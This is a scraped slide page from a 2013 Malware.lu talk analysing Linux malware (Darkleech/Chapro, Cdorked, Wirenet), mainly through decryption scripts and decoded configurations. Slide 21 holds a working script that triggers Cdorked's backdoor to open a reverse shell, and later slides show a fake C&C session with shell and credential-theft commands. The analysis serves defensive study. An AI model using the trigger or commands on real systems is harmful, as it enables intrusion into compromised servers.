linux malware presentation
play

Linux malware presentation @r00tbsd Paul Rascagnres Malware.lu - PowerPoint PPT Presentation

Sep 20, 2023 •108 likes •425 views

Linux malware presentation Linux malware presentation @r00tbsd Paul Rascagnres Malware.lu July 2013 @r00tbsd Paul Rascagnres from Malware.lu Linux malware presentation Plan - Presentation - Darkleech/Chapro - Cdorked - Wirenet

  1. Linux malware presentation Linux malware presentation @r00tbsd – Paul Rascagnères Malware.lu July 2013 @r00tbsd – Paul Rascagnères from Malware.lu

  2. Linux malware presentation Plan - Presentation - Darkleech/Chapro - Cdorked - Wirenet - Conclusion @r00tbsd – Paul Rascagnères from Malware.lu

  3. Linux malware presentation Presentation Who am I? Paul Rascangères - @r00tbsd or @malware.lu. Creator and maintener of malware.lu. Malware analysis, Incident Response, Reverse Engineering... Author of “Malware – Identification, analyse et éradication” @r00tbsd – Paul Rascagnères from Malware.lu

  4. Linux malware presentation Presentation Why am I here and why this talk? Some people think that malware don't exist on Linux platform. 4 examples in 2012/2013: - Darkleech (Apache module) - Cdorked (Apache server) - wirenet (Remote Administration Tool) - gift... @r00tbsd – Paul Rascagnères from Malware.lu

  5. Linux malware presentation Plan - Presentation - Darkleech/Chapro - Cdorked - Wirenet - Conclusion @r00tbsd – Paul Rascagnères from Malware.lu

  6. Linux malware presentation Darkleech/Chapro First seen The first version was identify in August 2012. How does it work? This malware is an apache module. The module is executed by LoadModule command and defines in the module configuration file. Features: - inject JavaScript code to redirect users on infected Website - backdoor @r00tbsd – Paul Rascagnères from Malware.lu

  7. Linux malware presentation Darkleech/Chapro Analysis - module Module file name: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so Example: mod_sec2_config.so Module execution: cat /etc/apache2/modules/[VARIOUS].conf LoadModule sec2_config_module modules/mod_sec2_config.so Analysis - Symptoms The malware injects Exploit Kits (JS) on the Web pages: @r00tbsd – Paul Rascagnères from Malware.lu

  8. Linux malware presentation Darkleech/Chapro Analysis - Symptoms @r00tbsd – Paul Rascagnères from Malware.lu

  9. Linux malware presentation Darkleech/Chapro Analysis – Symptoms The redirection is performed by a JavaScript insertion (IFrame): @r00tbsd – Paul Rascagnères from Malware.lu

  10. Linux malware presentation Darkleech/Chapro Analysis – Targets selection The targets selection is performed thanks to the REFERER. C_ARRAY_BAN_USERAGENT: SAFARI YANDEX OPERA CRAWLER FIREFOX JIKE CHROME SPIDER GOOGLEBOT ROBOT SLURP PAPERLIBOT YAHOO SNAPPREVIEWBOT BING BUFFERBOT LINUX MEDIAPARTNERS OPENBSD HATENA MACINTOSH BLUEDRAGON MAC OS WORDPRESS IPHONE XIANGUO ... @r00tbsd – Paul Rascagnères from Malware.lu

  11. Linux malware presentation Darkleech/Chapro Analysis – Reversing The data are encoded in the file: @r00tbsd – Paul Rascagnères from Malware.lu

  12. Linux malware presentation Darkleech/Chapro Analysis – Reversing Several function (symbols) are linked to the encoding: - 0x17C8 xor_decrypt_string - 0x17ED xor_encrypt_string - 0x1800 xor_encrypt @r00tbsd – Paul Rascagnères from Malware.lu

  13. Linux malware presentation Darkleech/Chapro Analysis – Reversing xor_decrypt_string pseudo-C xor_decrypt_string(A8, Ac, A10, A14) { L00003117(); ebx = ebx + 0x5001; esp = esp - 0xc; Vfffffff4 = A14 + 1; *esp = *( *( *( *(ebx + -300)) + 0xc)); *(ebp - 0x10) = L00002D90(); if(A14 > 0) { ecx = 0; do { edx = 0; eax = 0; edx = 0 >> 0x1f; Ac = Ac / Ac; al = *A10 & 0xff ^ *(Ac % Ac + A8); *( *(ebp - 0x10)) = al; } while(1 != A14); } esi = *(ebp - 0x10); *(esi + A14) = 0; eax = esi; esp = esp + 0xc;} @r00tbsd – Paul Rascagnères from Malware.lu

  14. Linux malware presentation Darkleech/Chapro Analysis – Reversing xor_decrypt_string python implementation : fd.seek(0x84a0) key = fd.read(23) for s in tab: fd.seek(s['offset']) data = fd.read(s['size']) decrypted = ''.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key))) clear_text = decrypted.split('\x00')[0] print('%s: %s') % (s['name'], clear_text) @r00tbsd – Paul Rascagnères from Malware.lu

  15. Linux malware presentation Darkleech/Chapro Analysis – Reversing $ python sec2.py "./mod_sec2_config.so" C_MODULE_VERSION: "2012.12.14" C_CC_HOST: "217.23.13.6" C_CC_URI: "/Home/index.php" C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1" Host: "%s" Content-Type: "application/x-www-form-urlencoded" Content-Length:" %i %s" C_MARKER_LEFT: "{{{" C_MARKER_RIGHT: "}}}" C_TMP_DIR: "/" C_LIST_PREF: "sess_" C_COOKIE_NAME: "PHP_SESSION_ID=" C_ARRAY_TAGS_FOR_INJECT: " < /script > < /style > < /head > < /title > ... @r00tbsd – Paul Rascagnères from Malware.lu

  16. Linux malware presentation Plan - Presentation - Darkleech/Chapro - Cdorked - Wirenet - Conclusion @r00tbsd – Paul Rascagnères from Malware.lu

  17. Linux malware presentation Cdorked Presentation Unliked it brother Darkleech/Chapro, Cdorked is not an Apache module but a custom apache server. The malware used a XOR to encrypt strings: fd.seek(0x16B460) # XOR key key = fd.read(24) for i, s in enumerate(tab): fd.seek(s['offset']) data = fd.read(s['size']) decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key))) print('xx%s: %s') % (i, decrypted) @r00tbsd – Paul Rascagnères from Malware.lu

  18. Linux malware presentation Cdorked How to get a shell ? - request @r00tbsd – Paul Rascagnères from Malware.lu

  19. Linux malware presentation Cdorked How to get a shell ? - encryption @r00tbsd – Paul Rascagnères from Malware.lu

  20. Linux malware presentation Cdorked How to get a shell ? - encryption Here is the code: ip = $client_ip key[0] = ( (ip AND 0xFF000000) >> 24 ) + 5 key[1] = ( (ip AND 0xFF0000 ) >> 16 ) + 33 key[2] = ( (ip AND 0xFF00 ) >> 8 ) + 55 key[3] = ( (ip ) ) + 78 @r00tbsd – Paul Rascagnères from Malware.lu

  21. Linux malware presentation Cdorked How to get a shell ? - the reverse-shell import urllib2 import subprocess import os LHOST = '192.168.56.1' LPORT = '4444' RHOST = '192.168.56.101' RPORT = '80' param = ('GET_BACK;%s;%s' % (LHOST, LPORT)).encode('hex') request = 'http://%s:%s/favicon.iso?%s' % (RHOST, RPORT, param) if os.fork(): req = urllib2.Request(request) req.add_header('X-Real-IP', '251.223.201.178') urllib2.urlopen(req) else: subprocess.call(['nc', '-l', LPORT]) @r00tbsd – Paul Rascagnères from Malware.lu

  22. Linux malware presentation Plan - Presentation - Darkleech/Chapro - Cdorked - Wirenet - Conclusion @r00tbsd – Paul Rascagnères from Malware.lu

  23. Linux malware presentation Wirenet Strings obfuscation The attacker used RC4 algorithm to encrypt configuration: @r00tbsd – Paul Rascagnères from Malware.lu

  24. Linux malware presentation Wirenet Strings obfuscation fp = open(sys.argv[1]) fp.seek(0xf4d8, 0) key = fp.read(16) for c in crypted: rc4 = ARC4.new(key) fp.seek(c['adr']) data = fp.read(c['len']) val = rc4.decrypt(data).split('\x00')[0] print "%s: %s" % (c['name'], val) if c['name'] == 'BoolSettingsByte': for name, o in options.iteritems(): print "%s: %s" % (name, isOption(val, o)) @r00tbsd – Paul Rascagnères from Malware.lu

  25. Linux malware presentation Wirenet Strings obfuscation y0ug@laptop:~$ python decode.py 9a0e765eecc5433af3dc726206ecc56e ConnectionString: 212.7.208.65:4141; ProxyString: - Password: sm0k4s523syst3m523 HostId: LINUX MutexName: vJEewiWD InstallPath: %home%/WIFIADAPT StartupKeyName1: WIFIADAPTER StartupKeyName2: - KeyLoggerFileName: %Home%\.m8d.dat BoolSettingsByte: 237 run_as_daemon: True xinit_start: False install_file: True lock_file?: True keylogger: True single_instance: True desktop_start: True ConnectionType: 001 @r00tbsd – Paul Rascagnères from Malware.lu

  26. Linux malware presentation Wirenet Fake C&C wirenet $ New session 127.0.0.1:52956 wirenet $ session 0 127.0.0.1:52956 LINUX rootbsd @ alien wirenet $ session 0 Switch to session 0 context 127.0.0.1:52956 $ help Undocumented commands: ====================== EOF cred_thunderbird get log_clear mkdir rm shell cp creds help log_get mv screen cred_pidgin exit info ls ps session @r00tbsd – Paul Rascagnères from Malware.lu

  27. Linux malware presentation Wirenet Fake C&C 127.0.0.1:52956 $ info arch: LINUX name: rootbsd @ alien DISTRIB_ID=Ubuntu DISTRIB_RELEASE=12.04 DISTRIB_CODENAME=precise DISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS" 127.0.0.1:52956 $ shell Shell is start with /bin/sh (EOF to exit) id uid=1000(rootbsd) gid=1000(rootbsd) groups=1000(rootbsd),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),11 8(admin),124(sambashare),1001(bumblebee) Shell is stop @r00tbsd – Paul Rascagnères from Malware.lu

  28. Linux malware presentation Wirenet Fake C&C wirenet $ New session 127.0.0.1:52956 wirenet $ session 0 127.0.0.1:52956 LINUX rootbsd @ alien wirenet $ session 0 Switch to session 0 context 127.0.0.1:52956 $ help Undocumented commands: ====================== EOF cred_thunderbird get log_clear mkdir rm shell cp creds help log_get mv screen cred_pidgin exit info ls ps session @r00tbsd – Paul Rascagnères from Malware.lu

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Understanding Linux Malware Emanuele Cozzi 1 , Mariano Graziano 2 , Yanick Fratantonio 1 , Davide

Understanding Linux Malware Emanuele Cozzi 1 , Mariano Graziano 2 , Yanick Fratantonio 1 , Davide

Understanding Linux Malware Emanuele Cozzi 1 , Mariano Graziano 2 , Yanick Fratantonio 1 , Davide Balzarotti 1 1 EURECOM 2 Cisco Systems, Inc. IEEE Symposium on Security & Privacy, May 2018 Malware and operating systems Malware and operating

690 views • 57 slides
Linux Malware Rootkits, Backdoors, and More... Michael Boelen michael.boelen@cisofy.com

Linux Malware Rootkits, Backdoors, and More... Michael Boelen michael.boelen@cisofy.com

Dealing with Linux Malware Rootkits, Backdoors, and More... Michael Boelen michael.boelen@cisofy.com Utrecht, 19 March 2016 Agenda Today 1. How do they get in 2. Why? 3. Malware types 4. In-depth: rootkits 5. Defenses 2

546 views • 35 slides
A Moose Once Bit My Honeypot A Story of an Embedded Linux Botnet by Olivier Bilodeau (

A Moose Once Bit My Honeypot A Story of an Embedded Linux Botnet by Olivier Bilodeau (

A Moose Once Bit My Honeypot A Story of an Embedded Linux Botnet by Olivier Bilodeau ( @obilodeau ) $ apropos Embedded Linux Malware Moose DNA (description) Moose Herding (the Operation) Whats New? Take Aways $ whoami Malware

1.19k views • 97 slides
Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware virus trojan horse etc. and how do we fight it? AV software Firewalls Filtering Patching Writing more secure software

540 views • 42 slides
Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware virus trojan horse etc. and how do we fight it? AV software Firewalls Filtering Patching Writing more secure software

568 views • 22 slides
Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the explosive growth of mobile device market and usage, there is an increasing number of malicious mobile applications targeting these devices and

819 views • 44 slides
Linux Kung Fu Introduction What is Linux? Why Linux? What is the difference between a client

Linux Kung Fu Introduction What is Linux? Why Linux? What is the difference between a client

Linux Kung Fu Introduction What is Linux? Why Linux? What is the difference between a client and a server? What is Linux? Linux generally refers to a group of Unix-like free and open-source operating system distributions that use the Linux

562 views • 53 slides
Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal

Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal

Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal paul@gtisc.gatech.edu Agenda Modern Malware Obfuscations, Server-side Polymorphism, Collection Volume Malware Analysis Detection

504 views • 27 slides
Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that

Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that

Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that does something that causes harm to a user, computer or network, including viruses, trojan horses, worms, rootkits, scareware and spyware. Malware

119 views • 9 slides
GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI

GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI

GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI CHRISTIAAN SCHADE TWENTE SECURITY LAB UNIVERSITY OF TWENTE THE NETHERLANDS AGENDA Something about malware Malware internals Current analysis

398 views • 27 slides
A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND CONTAINMENT FOR LARGE NETWORKS CHRISTIAAN SCHADE TWENTE SECURITY LAB UNIVERSITY OF TWENTE THE NETHERLANDS MALWARE WARS In the last

313 views • 14 slides
Malware Halting 1. Malware 2. Software diversity Part I: Method Development 3. Computer

Malware Halting 1. Malware 2. Software diversity Part I: Method Development 3. Computer

Overview Malware Halting 1. Malware 2. Software diversity Part I: Method Development 3. Computer immunization Kjell Jrgen Hole Simula@UiB 4. Epidemiological model 5. Malware halting analysis 6. Malware halting method Last updated

672 views • 29 slides
How does Malware Use RDTSC? A Study on Operations Executed by Malware with CPU Cycle Measurement

How does Malware Use RDTSC? A Study on Operations Executed by Malware with CPU Cycle Measurement

How does Malware Use RDTSC? A Study on Operations Executed by Malware with CPU Cycle Measurement Yoshihiro Oyama University of Tsukuba 1 Background Many malware programs execute operations for analysis evasion Detection of

346 views • 31 slides
Anti-anti-malware (part 3) / Stack Smashing 1 last time various kinds of armored malware

Anti-anti-malware (part 3) / Stack Smashing 1 last time various kinds of armored malware

Anti-anti-malware (part 3) / Stack Smashing 1 last time various kinds of armored malware malware that evades analysis 2 logistics: LEX homework detect push ret pattern using fmex probably easier than TRICKY 3 upcoming exam next Wednesday

496 views • 48 slides
Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware

Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware

DeepSec IDSC Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware Adventures Agenda INTRODUCTION ANDROID MALWARE COMMAND & CONTROL QUESTIONS & ANSWERS 2 1 2 3 4 Android Malware

1.01k views • 64 slides
Malware Defense I TDDD17 Information Security, Second Course Ulf Kargn Department of

Malware Defense I TDDD17 Information Security, Second Course Ulf Kargn Department of

Malware Defense I TDDD17 Information Security, Second Course Ulf Kargn Department of Computer and Information Science Linkping University Malware Defense Agenda 2 Two lectures Lecture I : Malware basics, malware on the PC,

621 views • 40 slides
A Semantics-based Approach to Malware Detection Mila Dalla Preda University of Verona, Italy

A Semantics-based Approach to Malware Detection Mila Dalla Preda University of Verona, Italy

A Semantics-based Approach to Malware Detection Mila Dalla Preda University of Verona, Italy Mihai Christodorescu, Somesh Jha University of Wisconsin, USA Saumya Debray University of Arizona, USA 17-19 Jan, POPL 07, Nice A

828 views • 52 slides
Malicious Code and Access Control in SDN SPRING14 , 31.7. 1.8.2014 Hans Christian Rpke

Malicious Code and Access Control in SDN SPRING14 , 31.7. 1.8.2014 Hans Christian Rpke

Malicious Code and Access Control in SDN SPRING14 , 31.7. 1.8.2014 Hans Christian Rpke Chair for System Security 1 Introduction 2 Malicious Code in SDN 3 Access Control in SDN 4 Conclusions Software-Defined Networks|Horst Grtz

418 views • 19 slides
Malware Obfuscation Techniques: Packing November 18, 2014 Malware and packing Not packed (20%)

Malware Obfuscation Techniques: Packing November 18, 2014 Malware and packing Not packed (20%)

Malware Obfuscation Techniques: Packing November 18, 2014 Malware and packing Not packed (20%) 80% of new malware are packed with various packers Malware Obfuscation Techniques: Packing 2 Malware and packing Not packed (20%) 80%

985 views • 51 slides
Virus Concepts and Terminology CS 4440/7440 Malware Analysis & Defense Today } Take a look at

Virus Concepts and Terminology CS 4440/7440 Malware Analysis & Defense Today } Take a look at

Virus Concepts and Terminology CS 4440/7440 Malware Analysis & Defense Today } Take a look at this: } https://www.corelan.be/index.php/articles/ } Check out the Exploit Writing Tutorials } Starting Szor, Chapter 2. } Check out the Virus

1.34k views • 46 slides
Evolutionary Computation for Improving Malware Analysis Kevin Leach 1 , Ryan Dougherty 2 , Chad

Evolutionary Computation for Improving Malware Analysis Kevin Leach 1 , Ryan Dougherty 2 , Chad

Evolutionary Computation for Improving Malware Analysis Kevin Leach 1 , Ryan Dougherty 2 , Chad Spensky 3 , Stephanie Forrest 2 , Westley Weimer 1 1 University of Michigan 2 Arizona State University 3 University of California, Santa Babara May 23,

357 views • 6 slides
GroDDViewer: Dynamic dual view of Android malware Jean-Franois Lalande Mathieu Simon Valrie

GroDDViewer: Dynamic dual view of Android malware Jean-Franois Lalande Mathieu Simon Valrie

Introduction Malware analysis Visualization Conclusion GroDDViewer: Dynamic dual view of Android malware Jean-Franois Lalande Mathieu Simon Valrie Viet Triem Tong GraMSec 2020 CIDRE team June 22th 2020 Introduction Malware analysis

530 views • 28 slides
Hypervisor-based Analysis of macOS Malware Felix Seele June 2 nd 2019 whoami Technical Lead

Hypervisor-based Analysis of macOS Malware Felix Seele June 2 nd 2019 whoami Technical Lead

Hypervisor-based Analysis of macOS Malware Felix Seele June 2 nd 2019 whoami Technical Lead @ VMRay M. Sc. IT-Security Released first preview version of macOS sandbox in March @c1truz_ 2 Structure of this Talk => => Why?

706 views • 36 slides
welfare and prediction markets are used to determine which policies will have the most positive

welfare and prediction markets are used to determine which policies will have the most positive

futarchy a form of government in which elected officials define measures of national welfare and prediction markets are used to determine which policies will have the most positive effect. 1 Victor, Im worried we wont be taken

670 views • 40 slides

More recommend